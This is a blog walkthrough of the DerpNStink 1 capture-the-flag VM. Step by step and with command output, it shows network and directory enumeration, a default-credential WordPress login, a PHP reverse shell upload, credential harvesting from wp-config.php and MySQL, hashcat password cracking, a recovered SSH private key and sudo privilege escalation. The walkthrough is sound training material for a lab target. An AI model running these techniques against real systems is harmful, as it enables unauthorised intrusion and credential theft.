Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

DerpNStink 1: CTF walkthrough

Introduction

Name: DerpNStink: 1

Date release: 9 Feb 2018

Author: Bryan Smith

Series: DerpNStink

 

Enumeration

We can search for the IP address of the VM with arp-scan:

redacted@odin:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] 192.168.1.105 00:0c:29:29:33:ed VMware, Inc. 192.168.1.105 ac:bc:32:80:fa:7f (Unknown) (DUP: 2) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.450 seconds (104.49 hosts/sec). 4 responded redacted@odin:~$

 

Then we can search for open ports:

redacted@odin:~$ nmap -A -F -O -sV --reason 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-07 03:43 EST Nmap scan report for 192.168.1.105 Host is up, received arp-response (0.00086s latency). Not shown: 97 closed ports Reason: 97 resets PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA) | 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA) | 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA) | 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |/php/ /temporary/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: DeRPnStiNK MAC Address: 00:0C:29:29:33:ED (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.86 ms 192.168.1.105 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds redacted@odin:~$
 

First flag

First of all we have to update our /etc/hosts file with the derpnstink domain name according to this file.

redacted@odin:~$ curl http://192.168.1.105/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> redacted@odin:~$

 

So, we simply have to execute this command:

redacted@odin:~$ echo '192.168.1.105        derpnstink.local' >> /etc/hosts

 

Then, the first flag can be found in the source code of the index.html page.

redacted@odin:~$ curl http://derpnstink.local |html2text
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1298 100 1298 0 0 1298 0 0:00:01 --:--:-- 0:00:01 158k h1 style="color:Purple; font-size:250%;">DeRPnStiNK [derp.png] [stinky.png] <--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) --> redacted@odin:~$

 

Now, we can search for others directories or pages.

That's why we can, first, use gobuster. After few seconds the weblog directory will appear.

redacted@odin:~$ gobuster -u http://derpnstink.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e
Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://derpnstink.local [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes : 200,204,301,302,307 [+] Expanded : true ===================================================== http://derpnstink.local/weblog (Status: 301) http://derpnstink.local/php (Status: 301) http://derpnstink.local/css (Status: 301) http://derpnstink.local/js (Status: 301) http://derpnstink.local/javascript (Status: 301) http://derpnstink.local/temporary (Status: 301) ===================================================== redacted@odin:~$

 

Then, another scan will show us that we have a Wordpress blog.

redacted@odin:~$ gobuster -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e
Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://derpnstink.local/weblog/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes : 200,204,301,302,307 [+] Expanded : true ===================================================== http://derpnstink.local/weblog/wp-content (Status: 301) http://derpnstink.local/weblog/wp-includes (Status: 301) http://derpnstink.local/weblog/wp-admin (Status: 301) ===================================================== redacted@odin:~$

 

Finally, we can log in the Wordpress admin panel with the user: admin and the password: admin.

After a bit of searching, we can see that we can upload arbitrary files when we add a new slide.

derpnstink_1_ctf__walktrough_galery_rshell_upload.png

 

Note, I used the basic php-reverse shell from pentestmonkey, basic php-reverse shell who give me a first access to the system.

derpnstink_1_ctf__walktrough_low_priv_shell.png
 

Second flag

In the system we can log in the mysql service with the credentials that we can find in the /var/www/html/weblog/wp-config.php file.

www-data@DeRPnStiNK:/var/www/html/weblog$ cat wp-config.php
cat wp-config.php
<?php data-preserve-html-node="true"
[..snip..]
define('DB_NAME', 'wordpress');

/ MySQL database username */
define('DB_USER', 'root');

/ MySQL database password /
define('DB_PASSWORD', 'mysql');

/** MySQL hostname /
define('DB_HOST', 'localhost');

/ Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/ The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 

After that, we can find the second flag in the mysql wp_posts table of the wordpress database.

www-data@DeRPnStiNK:/var/www/html/weblog$ mysql -uroot -pmysql -Dwordpress
[..snip..]
mysql> use wordpress
use wordpress
Database changed
mysql> select * from wp_posts;
[..snipp..]
| closed         | closed      |               | 2-revision-v1 |         |        | 2017-11-13 03:46:02 | 2017-11-13 03:46:02 |                       |           2 | http://derpnstink.local/weblog/2-revision-v1/               |          0 | revision  |                |             0 |
|  8 |           1 | 2017-11-13 05:39:11 | 0000-00-00 00:00:00 | flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
[..snip..]

 

Moreover, in the wp_users table, another user is present, unclestinky.

mysql> select  from wp_users;
select  from wp_users;
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
| ID | user_login  | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key                           | user_status | display_name | flag2 |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky   | unclestinky@DeRPnStiNK.local |          | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 |           0 | unclestinky  |       |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin         | admin@derpnstink.local       |          | 2017-11-13 04:29:35 |                                               |           0 | admin        |       |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
2 rows in set (0.00 sec)

 

We can easily crack this Wordpress hash with hashcat.

[..snip..]
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Wed Mar  7 12:57:55 2018 (1 min, 16 secs)
Time.Estimated...: Wed Mar  7 12:59:11 2018 (0 secs)
Guess.Base.......: File (Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:    37078 H/s (9.24ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2801664/14344385 (19.53%)
Rejected.........: 0/2801664 (0.00%)
Restore.Point....: 2777088/14344385 (19.36%)
Candidates.#2....: westham76 -> wcw32792

Started: Wed Mar  7 12:57:51 2018
Stopped: Wed Mar  7 12:59:12 2018
[..snip..]

 

So, the password for the user stinky is wedgie57.

 

Third flag

The third flag can be found in the Desktop of the stinky user.

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop

 

For the moment the SSH service can be only used with an private key.

Fortunately for us, a private key is hidden in the /home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh folder.

stinky@DeRPnStiNK:~$ cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
stinky@DeRPnStiNK:~$

 

We use this private key to log in the system.

redacted@odin:~$ ssh -i privatekey stinky@192.168.1.105
Ubuntu 14.04.5 LTS ,~~~.. ' Derrrrrp N ` ,~~~~, | Stink | / , \ ', __ ," /,~|__. \/ /~ (__)
() ; (^)(^)': =; _ ; ; """" ;= {"} ' '""' ' _{"} \/ > < __/ \ ," ", / \ " /" " "= > < =" "- -. ,' ---' Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) Documentation: https://help.ubuntu.com/ 386 packages can be updated. 305 updates are security updates. Last login: Wed Mar 7 08:33:30 2018 from 192.168.1.116 stinky@DeRPnStiNK:~$
 

Fourth flag

After a bit of searching we can find an interesting conversation located at : ftp/files/network-logs/derpissues.txt and a pcap file in user's documents.

stinky@DeRPnStiNK:~$ cat ftp/files/network-logs/derpissues.txt 
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~$ 
stinky@DeRPnStiNK:~$ 
stinky@DeRPnStiNK:~$ ls -la Documents/
total 4300
drwxr-xr-x  2 stinky stinky    4096 Nov 13 01:25 .
drwx------ 12 stinky stinky    4096 Mar  7 08:33 ..
-rw-r--r--  1 root   root   4391468 Nov 13 00:56 derpissues.pcap
stinky@DeRPnStiNK:~$

 

If we download and analyse this pcap file with Wireshark we can find the password of the mrderp user.

derpnstink_1_ctf__walktrough_pcap_mrderp_password.png

 

If we use the user mrderp, we can find a weird files called helpdesk.log in the Desktop. File who give us a link to a pastbin page.

mrderp@DeRPnStiNK:~/Desktop$ cat helpdesk.log
[..snip..]
Closed Ticket Notification

Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw 
Note that the Help Desk's busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
[..snip..]

 

If we take a look at this pastebin we can see that the /etc/sudoer file appears to contain this rule.

derpnstink_1_ctf__walktrough_pastbin_sudoer_rule.png

 

This rule means that if we create a file named derpy in the /home/mrderp/binaries/ folder we will be able to execute this file with root privilege.

mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ touch binaries/derpy.sh
mrderp@DeRPnStiNK:~$ echo '/bin/bash' >> binaries/derpy.sh 
mrderp@DeRPnStiNK:~$ chmod +x binaries/derpy.sh
mrderp@DeRPnStiNK:~$ sudo binaries/./derpy.sh root@DeRPnStiNK:~#

 

We successfully gain root privilege and we get the last flag of the CTF.

root@DeRPnStiNK:~# cat /root/Desktop/flag.txt 
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
[..snip..]

root@DeRPnStiNK:~#
 

Flags

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

 
 

break